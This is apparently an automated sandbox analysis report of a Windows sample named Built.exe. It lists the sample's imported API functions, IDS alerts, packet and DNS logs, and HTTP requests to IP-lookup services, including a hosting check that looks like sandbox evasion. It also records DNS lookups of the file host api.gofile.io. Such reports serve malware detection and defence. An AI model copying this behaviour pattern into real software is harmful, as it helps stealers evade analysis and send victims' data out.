                                                                                                                                                                                                                                                      KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
                                                                                                                                                                                                                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                                                                                                                      gdiplus.dllGdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                      2024-11-10T17:02:34.506611+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649726TCP
                                                                                                                                                                                                                                                      2024-11-10T17:03:13.264966+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649956TCP

                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.301614046 CET4970080192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.306550026 CET8049700208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.306629896 CET4970080192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.306849957 CET4970080192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.312297106 CET8049700208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.908087969 CET8049700208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.908698082 CET4970080192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.913939953 CET8049700208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.914007902 CET4970080192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.836833000 CET4970380192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.842094898 CET804970334.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.842200994 CET4970380192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.844841003 CET4970380192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.849608898 CET804970334.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:23.456208944 CET804970334.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:23.457083941 CET4970380192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:23.462811947 CET804970334.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:23.462865114 CET4970380192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.031359911 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.031436920 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.032526970 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.034806967 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.034825087 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.046180964 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.046230078 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.046592951 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.047125101 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.047137976 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.645436049 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.647089005 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.647133112 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.648490906 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.648555040 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651212931 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651411057 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651463032 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651588917 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.660569906 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.660612106 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.660821915 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.661395073 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.661413908 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.882719040 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.887984991 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.888008118 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.889322042 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.889393091 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.895075083 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.895216942 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.896755934 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.896785975 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.896858931 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.898658037 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.898669004 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.503468037 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.503968000 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.503977060 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.505019903 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.505075932 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.506382942 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.506527901 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.507611036 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.507644892 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.507709026 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.508034945 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.508045912 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.788520098 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.788954020 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.788980007 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.790083885 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.790148020 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.791591883 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.791591883 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.595789909 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.596311092 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.596327066 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.597358942 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.597522974 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.598717928 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.598886013 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.598937035 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.599013090 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:42.996911049 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.001961946 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.002042055 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.002326012 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.008110046 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.607237101 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.607558012 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.612862110 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.612915993 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.521658897 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.521676064 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.521735907 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.526444912 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.526453972 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.555805922 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.555841923 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.555922985 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.556348085 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.556360960 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.138223886 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.138859987 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.138871908 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.139734030 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.139796972 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141269922 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141369104 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141424894 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141468048 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.142456055 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.142469883 CET44349818159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.142533064 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.142822981 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.142838001 CET44349818159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.401165009 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.401561022 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.401576042 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.402451992 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.402534008 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.403723955 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.403834105 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.403888941 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.403888941 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.405117035 CET49819443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.405138016 CET44349819104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.405189037 CET49819443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.405483007 CET49819443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.405493975 CET44349819104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.000951052 CET44349819104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.001647949 CET49819443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.001663923 CET44349819104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.002547979 CET44349819104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.002605915 CET49819443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.003464937 CET49819443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.003567934 CET49819443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.004371881 CET49824443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.004391909 CET44349824159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.004561901 CET49824443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.004861116 CET49824443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.004868031 CET44349824159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.266185999 CET44349818159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.268960953 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.268973112 CET44349818159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.269968033 CET44349818159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.270030022 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.312999964 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.313119888 CET44349818159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.313189983 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:48.319066048 CET49818443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:49.097285986 CET44349824159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:49.098912001 CET49824443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:49.098929882 CET44349824159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:49.100567102 CET44349824159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:49.100639105 CET49824443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:49.101515055 CET49824443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:49.101634026 CET49824443192.168.2.6159.89.102.253

                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:20.044852018 CET5337753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:20.053761005 CET53533771.1.1.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.277750015 CET6203353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.285059929 CET53620331.1.1.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.820998907 CET6198053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.828632116 CET53619801.1.1.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.021780968 CET6134053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.028923035 CET53613401.1.1.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.036401987 CET6547453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.045572042 CET53654741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.652357101 CET6062853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.659907103 CET53606281.1.1.1192.168.2.6

                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:20.044852018 CET192.168.2.61.1.1.10x890bStandard query (0)blank-v1rwt.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.277750015 CET192.168.2.61.1.1.10x2679Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.820998907 CET192.168.2.61.1.1.10x48f6Standard query (0)ifconfig.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.021780968 CET192.168.2.61.1.1.10xa1a5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.036401987 CET192.168.2.61.1.1.10xb5dfStandard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.652357101 CET192.168.2.61.1.1.10x5499Standard query (0)geolocation-db.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:20.053761005 CET1.1.1.1192.168.2.60x890bName error (3)blank-v1rwt.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.285059929 CET1.1.1.1192.168.2.60x2679No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.828632116 CET1.1.1.1192.168.2.60x48f6No error (0)ifconfig.me34.160.111.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.028923035 CET1.1.1.1192.168.2.60xa1a5No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.028923035 CET1.1.1.1192.168.2.60xa1a5No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.028923035 CET1.1.1.1192.168.2.60xa1a5No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.045572042 CET1.1.1.1192.168.2.60xb5dfNo error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.659907103 CET1.1.1.1192.168.2.60x5499No error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                      • ip-api.com
                                                                                                                                                                                                                                                      • ifconfig.me

                                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.649700208.95.112.1802536C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.306849957 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:21.908087969 CET174INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sun, 10 Nov 2024 16:02:21 GMT
                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 5
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                                                                                                      Data Raw: 74 72 75 65 0a
                                                                                                                                                                                                                                                      Data Ascii: true


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.2.64970334.160.111.145805388C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:22.844841003 CET75OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                      Host: ifconfig.me
                                                                                                                                                                                                                                                      User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:23.456208944 CET165INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      date: Sun, 10 Nov 2024 16:02:22 GMT
                                                                                                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                                                                                                      Content-Length: 14
                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                                      Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32
                                                                                                                                                                                                                                                      Data Ascii: 173.254.250.72


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      2192.168.2.64979434.160.111.145803164C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.002326012 CET75OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                      Host: ifconfig.me
                                                                                                                                                                                                                                                      User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.607237101 CET165INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      date: Sun, 10 Nov 2024 16:02:42 GMT
                                                                                                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                                                                                                      Content-Length: 14
                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                                      Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32
                                                                                                                                                                                                                                                      Data Ascii: 173.254.250.72


                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:11:02:13
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe"
